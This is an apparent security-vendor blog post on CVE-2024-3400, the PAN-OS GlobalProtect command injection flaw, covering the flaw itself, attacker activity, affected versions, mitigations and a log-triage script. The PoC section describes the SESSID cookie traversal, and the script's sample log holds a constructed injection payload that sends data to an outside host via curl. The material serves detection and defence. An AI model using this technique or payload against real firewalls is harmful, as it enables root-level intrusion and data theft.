Written by: Ferdi Gül
Additional Contributions: Ferhat Dikbiyik

The critical vulnerability in Palo Alto Networks' PAN-OS tracked as CVE-2024-3400 has captured the attention of the cybersecurity community. This post analyzes CVE-2024-3400: what it is, how it is exploited, and what risk it poses to organizations, followed by the measures available against it. From a Third-Party Risk Management (TPRM) perspective, we explain why it matters to practitioners and what lessons can be drawn to guard against similar threats in the future.

WHAT’S THE CVE-2024-3400 VULNERABILITY?

Palo Alto Networks has disclosed a critical OS command injection vulnerability in the GlobalProtect feature of firewalls running the PAN-OS operating system. CVE-2024-3400 allows an unauthenticated attacker to execute arbitrary code with root privileges on affected devices, which can lead to network intrusion, data theft, or compromise of critical systems behind the firewall.

CISA has issued an alert for the PAN-OS vulnerability CVE-2024-3400, urging affected entities to apply the recommended mitigations and to report any suspicious activity.

WHAT ARE THE DETAILS FOR CVE-2024-3400?

CVE-2024-3400 is an OS command injection flaw in Palo Alto Networks' PAN-OS software that affects specific versions and feature configurations. Exploitation requires no authentication and lets an attacker execute arbitrary code with root privileges on the affected firewall. It applies to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls with a GlobalProtect gateway or GlobalProtect portal configured. The initial advisory also listed device telemetry as a prerequisite; Palo Alto Networks later clarified that telemetry does not need to be enabled for the flaw to be exploited. Potential consequences include full system compromise, theft or deletion of data, and interception or alteration of network traffic.

The attacker, tracked by Volexity as UTA0218 and assessed as likely state-backed, exploited the firewall to establish a reverse shell and install additional tools, gaining a foothold inside victim organizations. The attacker also attempted to install a custom Python backdoor named UPSTYLE on the firewall, which provides remote command execution through specially crafted network requests. Further tooling was downloaded from servers under the attacker's control to reach internal networks and extract sensitive credentials and files. The tradecraft and speed observed indicate a capable threat actor with clear objectives.

Organizations with GlobalProtect configured on their firewalls should address this vulnerability promptly to reduce the risk of exploitation and breach.

You can confirm if a GlobalProtect gateway or GlobalProtect portal is set up by reviewing entries in your firewall web interface (Network > GlobalProtect > Gateways or Network > GlobalProtect > Portals). 

Additionally, check whether device telemetry is enabled under Device > Setup > Telemetry. Note that, per Palo Alto Networks' updated advisory, exploitation does not depend on telemetry being enabled, so disabling it is not a mitigation; the GlobalProtect configuration is what determines exposure.

POC FOR THE VULNERABILITY

Our analysis is based on a recently published proof of concept (PoC). If you run an affected version, or want to test the issue yourself in a lab, the requests and expected responses are described below. The injection point is the SESSID cookie sent to the GlobalProtect portal or gateway: a path traversal in the cookie value causes the device to create a file, as root, at an attacker-chosen path, and a second stage embeds a shell command in that file name which a later scheduled job (the device telemetry job, in the public PoC) executes.

# Stage one: create a test file named 'BKTest' on the device with root privileges, using path traversal in the SESSID cookie so that the file lands in the portal's images directory.

Requesting the created file should then return a 403 Forbidden rather than a 404 Not Found: the zero-byte file exists but is not readable by the web server. On a system that is not vulnerable (or on which the write failed), the expected response is 404 Not Found.

# This request checks for the presence of the “BKTest.txt” file:

 GET /global-protect/portal/images/BKTest.txt HTTP/1.1

# Stage two: command injection. A shell command is embedded in the file name created through the same cookie; when the scheduled job processes the file, the name is interpolated into a shell command line and runs as root.
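Defenders do not need the exploit to spot attempts against their own firewalls: Palo Alto Networks' advisory points at the GlobalProtect service log, where traversal in the SESSID cookie surfaces as a "failed to unmarshal session(...)" error whose argument is a path rather than a 32-character session ID (the vendor's CLI check is grep pattern "failed to unmarshal session(.\+.\/" mp-log gpsvc.log*). The script below is an added example for this post, not Palo Alto Networks code; it implements that check over log text and separates stage-one traversal probes from stage-two command injection. The log lines are constructed samples: only the "failed to unmarshal session(...)" fragment mirrors real PAN-OS log text, and the surrounding timestamp and process fields are assumptions.

```python
r"""Triage GlobalProtect gpsvc.log lines for CVE-2024-3400 exploitation attempts.

Added example (not vendor code). Implements the check behind the advisory's
CLI command  grep pattern "failed to unmarshal session(.\+.\/" mp-log gpsvc.log*
and classifies each hit.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List

# A legitimate GlobalProtect session ID is a 32-character hex string. Anything
# else reaching the unmarshal error is suspicious; a path separator means the
# cookie carried a traversal payload.
_UNMARSHAL = re.compile(r"failed to unmarshal session\((?P<sid>.*)\)")
_LEGIT_SID = re.compile(r"^[0-9a-fA-F]{32}$")
# Shell metacharacters that turn a traversal file name into stage two (root command execution).
_SHELL_META = re.compile(r"`|\$\(|\$\{IFS\}|;|\||&&")
# Directory used by the public PoC: the device telemetry job picks up files written here.
_TELEMETRY_DIR = "/opt/panlogs/tmp/device_telemetry/"


@dataclass
class Finding:
    line_no: int
    session_value: str
    verdict: str  # "malformed", "traversal" or "command_injection"


def classify_session_value(sid: str) -> str:
    """Map the text inside session(...) to a verdict."""
    if _LEGIT_SID.match(sid):
        return "benign"            # expired/unknown but well-formed session ID
    if "/" in sid or "\\" in sid:
        return "command_injection" if _SHELL_META.search(sid) else "traversal"
    return "malformed"             # not hex, no path: worth a look, not an exploit


def scan_gpsvc_log(lines: Iterable[str]) -> List[Finding]:
    """Return every non-benign unmarshal failure, with its 1-based line number."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        m = _UNMARSHAL.search(line)
        if not m:
            continue
        sid = m.group("sid")
        verdict = classify_session_value(sid)
        if verdict != "benign":
            findings.append(Finding(n, sid, verdict))
    return findings


def extract_injected_command(sid: str) -> str:
    """Return the file-name component the attacker wrote under the telemetry
    directory (stage two: this is what gets interpolated into a shell)."""
    idx = sid.find(_TELEMETRY_DIR)
    if idx < 0:
        return ""
    rest = sid[idx + len(_TELEMETRY_DIR):]          # e.g. "minute/BKTest"
    return rest.split("/", 1)[1] if "/" in rest else rest


# Constructed sample log (assumed layout; only the session(...) text mirrors PAN-OS).
SAMPLE_LOG = """\
2024-04-12 07:14:02 gpsvc  session 0123456789abcdef0123456789abcdef authenticated
2024-04-12 07:15:33 gpsvc  failed to unmarshal session(0123456789abcdef0123456789abcdef) error: expired
2024-04-12 07:16:10 gpsvc  failed to unmarshal session(./../../../opt/panlogs/tmp/device_telemetry/minute/BKTest)
2024-04-12 07:16:41 gpsvc  failed to unmarshal session(./../../../opt/panlogs/tmp/device_telemetry/minute/x`curl${IFS}198.51.100.7/$(whoami)`)
"""

if __name__ == "__main__":
    for f in scan_gpsvc_log(SAMPLE_LOG.splitlines()):
        print(f"line {f.line_no}: {f.verdict:18} {extract_injected_command(f.session_value) or f.session_value}")
```

Run it against the output of the vendor's grep (or a full gpsvc.log export) rather than the sample; a "traversal" verdict with a file name that has no shell metacharacters is typically the 403/404 probe described above, while "command_injection" means the host should be treated as compromised and the embedded command preserved as an IOC.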

WHAT’S THE RELATIONSHIP BETWEEN THE VULNERABILITY AND THREAT ACTORS/RANSOMWARE GROUPS?

Because these products are widely deployed in corporate environments, any vulnerability in them is almost certain to be on threat actors' radar.

Operation MidnightEclipse is the name Palo Alto Networks' Unit 42 gave to the exploitation activity observed in the first quarter of 2024. Exploiting CVE-2024-3400 in the GlobalProtect feature of PAN-OS, the operation targeted entities including government agencies, financial institutions, and critical infrastructure providers. Using the bespoke backdoor UPSTYLE, the attackers gained access to affected firewalls for data exfiltration and command and control. The operation underscores the evolving risk landscape and the need for awareness and preparedness: users should install the latest patches and actively monitor for signs of compromise.

Separately, Volexity observed the threat actor it tracks as UTA0218 exploiting the vulnerability remotely, creating a reverse shell, downloading additional tools, pivoting into internal networks, and ultimately exfiltrating data. The skill and speed displayed point to a highly capable actor that knows which resources to target. UTA0218's initial objectives included obtaining the domain backup DPAPI key and harvesting Active Directory credentials by acquiring the NTDS.DIT file.

They also targeted user workstations to steal saved browser cookies and login data along with users' DPAPI keys.

WHAT’S THE SCOPE OF THE PAN-OS COMMAND INJECTION VULNERABILITY?

CVE-2024-3400 affects PAN-OS firewalls with a GlobalProtect gateway or portal configured that run the following version trains:

  • PAN-OS 10.2.x
  • PAN-OS 11.0.x
  • PAN-OS 11.1.x

Earlier trains are not affected, regardless of GlobalProtect or device telemetry configuration:

  • PAN-OS 10.1.x
  • PAN-OS 10.0.x
  • PAN-OS 9.1.x
  • PAN-OS 9.0.x

Note: Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

The issue is fixed in the hotfix releases PAN-OS 10.2.9-h1, 11.0.4-h1, and 11.1.2-h3, and in all later releases. Palo Alto Networks has also committed to hotfixes for other commonly deployed maintenance releases; the current list and release dates are maintained in the security advisory at https://security.paloaltonetworks.com/CVE-2024-3400.
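For a TPRM or asset-inventory review the practical question is whether a given PAN-OS version string is below the first fixed build of its train. The script below is an added example for this post, not Palo Alto Networks code. It encodes only the three hotfixes named above (10.2.9-h1, 11.0.4-h1, 11.1.2-h3) and treats 9.0, 9.1, 10.0 and 10.1 as unaffected; because the vendor later shipped hotfixes for earlier maintenance releases too, a hotfixed build on an older maintenance release is reported as "check_advisory" instead of being guessed either way. The inventory rows are constructed sample data.

```python
"""Triage PAN-OS version strings against the CVE-2024-3400 fixed releases.

Added example (not vendor code). FIRST_FIXED holds the three hotfixes named
in the advisory at the time of writing; extend it as further hotfixes for
older maintenance releases are published.
"""
import re
from typing import Dict, List, Tuple

Train = Tuple[int, int]   # (major, minor), e.g. (10, 2)
Build = Tuple[int, int]   # (maintenance, hotfix); hotfix is 0 when absent

# First fixed build per affected train: 10.2.9-h1, 11.0.4-h1, 11.1.2-h3.
FIRST_FIXED: Dict[Train, Build] = {
    (10, 2): (9, 1),
    (11, 0): (4, 1),
    (11, 1): (2, 3),
}

# PAN-OS versions look like "10.2.9" or "10.2.9-h1".
_VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos_version(version: str) -> Tuple[Train, Build]:
    m = _VERSION.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor)), (int(maint), int(hotfix or 0))


def assess(version: str, globalprotect_configured: bool = True) -> str:
    """One of: not_exposed, not_affected, fixed, vulnerable, check_advisory."""
    if not globalprotect_configured:
        # No GlobalProtect gateway or portal: the vulnerable code path is not reachable.
        return "not_exposed"
    train, build = parse_panos_version(version)
    if train not in FIRST_FIXED:
        # 9.0, 9.1, 10.0, 10.1 are not affected; other trains are not listed as affected.
        return "not_affected"
    fixed = FIRST_FIXED[train]
    if build >= fixed:            # tuple compare: (maintenance, hotfix)
        return "fixed"
    if build[1] > 0 and build[0] < fixed[0]:
        # Hotfix on an earlier maintenance release (e.g. 10.2.8-h3): not decidable
        # from the three builds encoded here; consult the advisory's table.
        return "check_advisory"
    return "vulnerable"


def triage_inventory(rows: List[Tuple[str, str, bool]]) -> Dict[str, str]:
    """rows: (hostname, version, globalprotect_configured) -> {hostname: verdict}."""
    return {host: assess(version, gp) for host, version, gp in rows}


# Constructed sample inventory (hostnames and versions are illustrative).
SAMPLE_INVENTORY: List[Tuple[str, str, bool]] = [
    ("fw-edge-01", "10.2.8", True),
    ("fw-edge-02", "10.2.9-h1", True),
    ("fw-dc-01", "11.1.2-h2", True),
    ("fw-dc-02", "11.1.2-h3", True),
    ("fw-lab-01", "10.2.8-h3", True),
    ("fw-mgmt-01", "10.1.11", True),
    ("fw-int-01", "11.0.3", False),
]

if __name__ == "__main__":
    for host, verdict in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{host:12} {verdict}")
```

Feed it the version column from Panorama or from "show system info" on each device together with the GlobalProtect check from the web interface; anything reported as "vulnerable" or "check_advisory" should be patched or verified against the advisory's version table before the vendor questionnaire below is considered answered.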

HOW MANY ENDPOINTS CAN BE ACCESSED THROUGH PAN-OS AND GLOBALPROTECT?

PAN-OS and GlobalProtect are widely adopted by organizations worldwide. Black Kite research on externally exposed PAN-OS and GlobalProtect instances found that each product individually accounts for more than 34,000 internet-accessible endpoints. Note that the GlobalProtect population may differ from that of PAN-OS in general, since not every firewall has GlobalProtect configured.

Figure: top countries by number of externally accessible GlobalProtect and PAN-OS endpoints.

Timeline for CVE-2024-3400:

  • March 26, 2024

o   Earliest successful exploitation attempts observed across multiple organizations.

  • April 10, 2024

o   Volexity identifies zero-day exploitation of the vulnerability in a customer's firewall.

  • April 12, 2024

o   Initial publication. Volexity observes UTA0218 exploiting firewall devices to deploy malicious payloads and alerts Palo Alto Networks.

o   Palo Alto Networks publishes the security advisory CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect: https://security.paloaltonetworks.com/CVE-2024-3400

o   CISA adds the vulnerability to its Known Exploited Vulnerabilities catalog: https://www.cisa.gov/known-exploited-vulnerabilities-catalog

o   Microsoft publishes Defender support for CVE-2024-3400 affecting Palo Alto Networks firewalls: https://techcommunity.microsoft.com/t5/microsoft-defender-vulnerability/defender-support-for-cve-2024-3400-affecting-palo-alto-networks/ba-p/4113917

o   Black Kite's Research Team analyzes the vulnerability and completes FocusTag™ processing.

  • April 14, 2024

o   Palo Alto Networks clarifies the impact on GlobalProtect portal configurations and releases the first patches for CVE-2024-3400.

  • April 15, 2024

o   Further PAN-OS fixes are released; Palo Alto Networks states that additional fixes are forthcoming and clarifies workarounds and mitigations for firewalls managed with Panorama templates.

  • April 16, 2024

o   Proof-of-concept exploit code is published.

  • April 17, 2024

o   Additional Threat Prevention Threat IDs are added to the advisory's Workarounds and Mitigations.

o   A command-line interface (CLI) check to identify potential signs of exploit activity is added to the advisory.

Mitigations

Palo Alto Networks has released software patches addressing CVE-2024-3400; install them on all affected devices as soon as possible. Until the patch is applied, and in addition to it:

  • If you have a Threat Prevention subscription, enable the vulnerability protection Threat IDs published in the advisory (95187, and the later-added 95189 and 95191) on the security policy that covers GlobalProtect traffic.
  • Disable the GlobalProtect gateway and/or portal where they are not needed. Disabling device telemetry was suggested in the initial advisory, but Palo Alto Networks has since confirmed it does not prevent exploitation.
  • Reduce exposure where the design allows, for example by restricting access to the GlobalProtect portal and gateway with security policy or ACLs to expected source networks.
  • Keep the firewall's operating system up to date.
  • Monitor GlobalProtect logs and network traffic for signs of exploitation, using the checks published in the advisory.

HOW CAN TPRM PROFESSIONALS ADDRESS THE PAN-OS INCIDENT’S WIDE-REACHING IMPLICATIONS?

The recent discovery of CVE-2024-3400, a critical OS command injection vulnerability in Palo Alto Networks PAN-OS, demands immediate attention from TPRM (Third-Party Risk Management) professionals. This vulnerability poses a severe threat because it allows attackers to potentially take complete control of affected firewalls without needing any authentication.

The widespread impact of CVE-2024-3400 stems from its potential to affect entire organizations that rely on Palo Alto firewalls for their network security. A successful exploit could grant attackers access to a vast amount of sensitive data or even disrupt critical operations.

TPRM Strategies for Mitigating CVE-2024-3400 Risks

  • Confirm exposure with Palo Alto Networks: TPRM professionals should use the vendor advisory, and support channels where needed, to confirm whether each PAN-OS version and configuration in use is vulnerable to CVE-2024-3400.
  • Proactive Risk Assessments: Don’t wait for vendor updates. Conduct thorough risk assessments to identify potentially affected firewalls within your network.
  • Threat Intelligence is Key: Utilize threat intelligence feeds to stay updated on the evolving exploitation landscape surrounding CVE-2024-3400 and identify any indicators of compromise.
  • Patch Immediately: patches are available from Palo Alto Networks; prioritize their deployment on all vulnerable firewalls to close the exploitation window.

Effective Risk Management Through Collaboration

By working closely with vendors and leveraging threat intelligence, TPRM professionals can ensure a comprehensive understanding of their exposure to CVE-2024-3400. This proactive approach allows for swift mitigation strategies and strengthens your organization’s overall cybersecurity posture.

Check out the Black Kite Supply Chain Module here

Questions to ask vendors:

In the wake of CVE-2024-3400, which impacts Palo Alto Networks firewalls, TPRM professionals should prioritize asking pointed questions to assess vendor exposure and implemented mitigation strategies:

Impact Assessment:

  • Does your organization use Palo Alto Networks firewalls running PAN-OS 10.2, 11.0, or 11.1 with a GlobalProtect gateway or portal configured?
  • Have you identified any potentially vulnerable firewalls within your infrastructure based on the configuration details outlined in the CVE-2024-3400 advisory?

Mitigation Strategy:

  • Have you implemented the patches released by Palo Alto Networks to address CVE-2024-3400 on your vulnerable firewalls?
  • If patches are not yet deployed, what is your estimated timeline for patching these systems?

Detection and Remediation:

  • Have you conducted scans or used specific tools to detect firewalls running the vulnerable PAN-OS versions (10.2, 11.0, 11.1) with GlobalProtect configured?
  • If any vulnerable systems were identified, what steps have you taken to isolate and remediate them?

Vendor Transparency:

  • Can you share any indicators of compromise (IOCs) or specific details related to exploitation attempts observed for CVE-2024-3400 within your environment?
  • How do you track Palo Alto Networks' follow-up advisories, the hotfixes for your specific maintenance releases, and the updated detection guidance for CVE-2024-3400?

How can Vendors Detect and Remediate CVE-2024-3400?

CVE-2024-3400 mitigation strategies include enabling the Threat Prevention vulnerability signatures for this issue (Threat ID 95187, plus the later-added 95189 and 95191) if subscribed, reviewing the Palo Alto Networks advisory for the log checks that reveal exploitation attempts, and using updated vulnerability scanners to find susceptible firewalls. Disabling device telemetry was initially recommended but does not prevent exploitation. These measures reduce risk only until the official patch from Palo Alto Networks is applied.

Detection

  • Identify Vulnerable Systems: Palo Alto Networks PAN-OS versions 10.2, 11.0, and 11.1 with a GlobalProtect gateway or portal (or both) configured are susceptible.
  • Security Software Scans: Utilize up-to-date security solutions that can detect this type of vulnerability.
  • Security Advisories: Refer to the Palo Alto Networks advisory (https://security.paloaltonetworks.com/CVE-2024-3400) and Unit 42's threat brief (https://unit42.paloaltonetworks.com/cve-2024-3400/) for detection methodology, including the CLI check for traversal attempts in GlobalProtect logs.

Remediation

  • Patch Installation: Apply the security patch released by Palo Alto Networks as soon as possible.

Immediate Actions

  • Identify Vulnerable Devices: Determine which of your firewalls are running susceptible PAN-OS versions and have GlobalProtect configured as described above.

Verification

  • Post-Patch Verification: after installing the patch, confirm that the running version is a fixed release and review GlobalProtect logs for earlier exploitation attempts as described in the advisory; patching closes the vulnerability but does not undo a compromise that already occurred.

Communication

  • Stakeholder Communication: Inform all relevant personnel concerning the vulnerability and the implemented mitigation strategies.
  • Continuous Updates: Provide ongoing updates throughout the process as new information arises.

EMPOWERING TPRM PROFESSIONALS: NAVIGATING CVE-2024-3400 WITH BLACK KITE’S FOCUS TAGS

Today, we set our sights on CVE-2024-3400, a critical vulnerability impacting Palo Alto Networks firewalls. Let’s delve into the implications for Third-Party Risk Management (TPRM) professionals and explore how Black Kite’s FocusTags™ can empower them to navigate this complex issue.

In the Black Kite dashboard, users can filter all vendors associated with the GlobalProtect vulnerability using FocusTags™.

Black Kite released the GlobalProtect tag on April 12, 2024, offering insight into potentially vulnerable assets and vendors. TPRM professionals can use this information to identify and prioritize risk assessments for vendors running affected PAN-OS versions with GlobalProtect, streamlining remediation and strengthening their cybersecurity posture.

Black Kite users can search through their vendor ecosystem using FocusTags™.

CONCLUSION

The recent revelation of CVE-2024-3400, a critical vulnerability in Palo Alto Networks firewalls, is a stark reminder of the constant vigilance required in cybersecurity. This zero-day, exploitable by unauthenticated attackers, underscores the importance of timely patching and robust security configurations.

CVE-2024-3400 exposes Palo Alto Networks firewalls to a critical remote code execution vulnerability. Immediate action is required to patch affected systems and mitigate potential compromise. This incident highlights the necessity for vigilance in maintaining up-to-date security measures and underscores the importance of layered defenses for robust network security.

The wake-up call from CVE-2024-3400 is two-fold. First, for Palo Alto Networks users, ensuring their firewalls are updated with the latest patches is paramount. Second, this incident highlights the need for a layered security approach. While firewalls are a crucial line of defense, they should not be the sole reliance.

Moving forward, organizations must prioritize continuous security monitoring and threat intelligence gathering. Proactive measures like penetration testing and vulnerability scanning can help identify weaknesses before they are exploited.

By working together, sharing threat information, and implementing a multi-layered defense strategy, we can build a more resilient digital ecosystem. Let’s learn from CVE-2024-3400 and use it as an opportunity to strengthen our collective cybersecurity posture.

About Focus Friday

Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.

Want to take a closer look at Focus Tags™?

Take our platform for a test drive and request a demo today.

FocusTags™ in the Last 30 Days:

  • GlobalProtect [Suspected]: CVE-2024-3400, OS Command Injection Vulnerability
  • Oracle WebLogic: CVE-2024-21007, CVE-2024-21006, Unauthorized Critical Data Access Vulnerability [Updated Tag]
  • Adobe Commerce [Suspected]: CVE-2024-20720, CVE-2024-20719, OS Command Injection Vulnerability, XSS Vulnerability
  • XZ Utils Backdoor: CVE-2024-3094, tagging completed for the Alpine, Fedora, Debian and openSUSE Tumbleweed distributions
  • pgAdmin [Suspected]: CVE-2024-2044 (tagged on an all-version basis), CVE-2024-3116, Remote Code Execution Vulnerability [Updated Tag]
  • OpenEdge [Suspected]: CVE-2024-1403, Authentication Bypass Vulnerability
  • QNAP QTS: CVE-2024-21899, Improper Authentication Vulnerability [Updated Tag]
  • Outlook RCE: CVE-2024-21378, Remote Code Execution Vulnerability
  • FortiOS SSL VPN [Suspected]: CVE-2024-23112, Authentication Bypass Vulnerability [Updated Tag]
  • FortiClient EMS [Suspected]: CVE-2023-48788, SQL Injection Vulnerability
  • PostgreSQL [Suspected]: CVE-2024-1597, SQL Injection Vulnerability
  • Apache HTTP Server: CVE-2021-41773, Path Traversal Vulnerability, RCE Vulnerability

References:

Volexity, first detailed analysis of the vulnerability and of UTA0218's activity.

Unit 42, details of the vulnerability and Operation MidnightEclipse: https://unit42.paloaltonetworks.com/cve-2024-3400/

CISA, Palo Alto Networks Releases Guidance for Vulnerability in PAN-OS (CVE-2024-3400): https://www.cisa.gov/news-events/alerts/2024/04/12/palo-alto-networks-releases-guidance-vulnerability-pan-os-cve-2024-3400

Volexity, indicators of compromise (IOCs).

Volexity, YARA rules.

Palo Alto Networks Security Advisory for CVE-2024-3400: https://security.paloaltonetworks.com/CVE-2024-3400

Nimrod Roimyi, Defender support for CVE-2024-3400 affecting Palo Alto Networks firewalls, Microsoft Defender Vulnerability Management Blog: https://techcommunity.microsoft.com/t5/microsoft-defender-vulnerability/defender-support-for-cve-2024-3400-affecting-palo-alto-networks/ba-p/4113917